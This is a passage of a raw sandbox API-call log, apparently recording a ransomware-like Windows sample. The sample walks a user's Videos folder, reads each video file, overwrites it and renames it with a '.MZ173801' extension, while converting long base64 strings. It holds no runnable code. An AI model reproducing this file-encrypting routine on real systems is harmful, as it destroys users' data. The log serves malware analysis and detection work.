lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0120.950] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0120.950] GetCurrentThreadId () returned 0x1358 [0120.950] GetCurrentThreadId () returned 0x1358 [0120.950] GetCurrentThreadId () returned 0x1358 [0120.950] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\suu6d\\9XOvT j3.flv" (normalized: "c:\\users\\fd1hvy\\videos\\suu6d\\9xovt j3.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0120.950] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d8*=0) returned 0x0 [0120.950] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0120.950] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x10d33 [0120.950] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0120.951] ReadFile (in: hFile=0x3d0, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x10d33, lpNumberOfBytesRead=0x19f6e4, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f6e4*=0x10d33, lpOverlapped=0x0) returned 1 [0120.952] CloseHandle (hObject=0x3d0) returned 1 [0120.954] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\suu6d\\9XOvT j3.flv" (normalized: "c:\\users\\fd1hvy\\videos\\suu6d\\9xovt j3.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0120.955] WriteFile (in: hFile=0x3d0, lpBuffer=0x23a47a0*, nNumberOfBytesToWrite=0x10d33, lpNumberOfBytesWritten=0x19f6f0, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesWritten=0x19f6f0*=0x10d33, lpOverlapped=0x0) returned 1 [0120.958] CloseHandle (hObject=0x3d0) returned 1 [0120.960] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\suu6d\\9XOvT j3.flv" (normalized: "c:\\users\\fd1hvy\\videos\\suu6d\\9xovt j3.flv"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\suu6d\\9XOvT j3.flv.MZ173801" (normalized: "c:\\users\\fd1hvy\\videos\\suu6d\\9xovt j3.flv.mz173801")) returned 1 [0120.961] GetCurrentThreadId () returned 0x1358 [0120.961] GetCurrentThreadId () returned 0x1358 [0120.961] GetCurrentThreadId () returned 0x1358 [0120.961] GetCurrentThreadId () returned 0x1358 [0120.961] GetCurrentThreadId () returned 0x1358 [0120.961] GetCurrentThreadId () returned 0x1358 [0120.961] FindNextFileW (in: hFindFile=0xa1bcb0, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7412130, ftCreationTime.dwHighDateTime=0x1d5eaa7, ftLastAccessTime.dwLowDateTime=0xee578000, ftLastAccessTime.dwHighDateTime=0x1d5e3e7, ftLastWriteTime.dwLowDateTime=0xee578000, ftLastWriteTime.dwHighDateTime=0x1d5e3e7, nFileSizeHigh=0x0, nFileSizeLow=0x11214, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="torEQ-P8Pc0pag.flv", cAlternateFileName="TOREQ-~1.FLV")) returned 1 [0120.961] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0120.961] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0120.962] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\suu6d\\torEQ-P8Pc0pag.flv" (normalized: "c:\\users\\fd1hvy\\videos\\suu6d\\toreq-p8pc0pag.flv"), fInfoLevelId=0x0, lpFileInformation=0x19f724 | out: lpFileInformation=0x19f724*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7412130, ftCreationTime.dwHighDateTime=0x1d5eaa7, ftLastAccessTime.dwLowDateTime=0xee578000, ftLastAccessTime.dwHighDateTime=0x1d5e3e7, ftLastWriteTime.dwLowDateTime=0xee578000, ftLastWriteTime.dwHighDateTime=0x1d5e3e7, nFileSizeHigh=0x0, nFileSizeLow=0x11214)) returned 1 [0120.962] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0120.962] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0120.963] GetCurrentThreadId () returned 0x1358 [0120.963] GetCurrentThreadId () returned 0x1358 [0120.963] GetCurrentThreadId () returned 0x1358 [0120.963] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0120.963] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0120.964] GetCurrentThreadId () returned 0x1358 [0120.964] GetCurrentThreadId () returned 0x1358 [0120.964] GetCurrentThreadId () returned 0x1358 [0120.964] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\suu6d\\torEQ-P8Pc0pag.flv" (normalized: "c:\\users\\fd1hvy\\videos\\suu6d\\toreq-p8pc0pag.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0120.964] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d8*=0) returned 0x0 [0120.964] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0120.964] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x11214 [0120.964] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0120.965] ReadFile (in: hFile=0x3d0, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x11214, lpNumberOfBytesRead=0x19f6e4, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f6e4*=0x11214, lpOverlapped=0x0) returned 1 [0120.966] CloseHandle (hObject=0x3d0) returned 1 [0121.047] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\suu6d\\torEQ-P8Pc0pag.flv" (normalized: "c:\\users\\fd1hvy\\videos\\suu6d\\toreq-p8pc0pag.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0121.048] WriteFile (in: hFile=0x3d0, lpBuffer=0x23a47a0*, nNumberOfBytesToWrite=0x11214, lpNumberOfBytesWritten=0x19f6f0, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesWritten=0x19f6f0*=0x11214, lpOverlapped=0x0) returned 1 [0121.051] CloseHandle (hObject=0x3d0) returned 1 [0121.053] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\suu6d\\torEQ-P8Pc0pag.flv" (normalized: "c:\\users\\fd1hvy\\videos\\suu6d\\toreq-p8pc0pag.flv"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\suu6d\\torEQ-P8Pc0pag.flv.MZ173801" (normalized: "c:\\users\\fd1hvy\\videos\\suu6d\\toreq-p8pc0pag.flv.mz173801")) returned 1 [0121.054] GetCurrentThreadId () returned 0x1358 [0121.054] GetCurrentThreadId () returned 0x1358 [0121.054] GetCurrentThreadId () returned 0x1358 [0121.054] GetCurrentThreadId () returned 0x1358 [0121.054] GetCurrentThreadId () returned 0x1358 [0121.054] GetCurrentThreadId () returned 0x1358 [0121.054] FindNextFileW (in: hFindFile=0xa1bcb0, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf29c41c0, ftCreationTime.dwHighDateTime=0x1d5e5ac, ftLastAccessTime.dwLowDateTime=0x3fd86650, ftLastAccessTime.dwHighDateTime=0x1d5e7ae, ftLastWriteTime.dwLowDateTime=0x3fd86650, ftLastWriteTime.dwHighDateTime=0x1d5e7ae, nFileSizeHigh=0x0, nFileSizeLow=0x3c8d, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="twHBtCvhRR2G5.mkv", cAlternateFileName="TWHBTC~1.MKV")) returned 1 [0121.054] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0121.054] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0121.054] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\suu6d\\twHBtCvhRR2G5.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\suu6d\\twhbtcvhrr2g5.mkv"), fInfoLevelId=0x0, lpFileInformation=0x19f724 | out: lpFileInformation=0x19f724*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf29c41c0, ftCreationTime.dwHighDateTime=0x1d5e5ac, ftLastAccessTime.dwLowDateTime=0x3fd86650, ftLastAccessTime.dwHighDateTime=0x1d5e7ae, ftLastWriteTime.dwLowDateTime=0x3fd86650, ftLastWriteTime.dwHighDateTime=0x1d5e7ae, nFileSizeHigh=0x0, nFileSizeLow=0x3c8d)) returned 1 [0121.054] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0121.055] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMz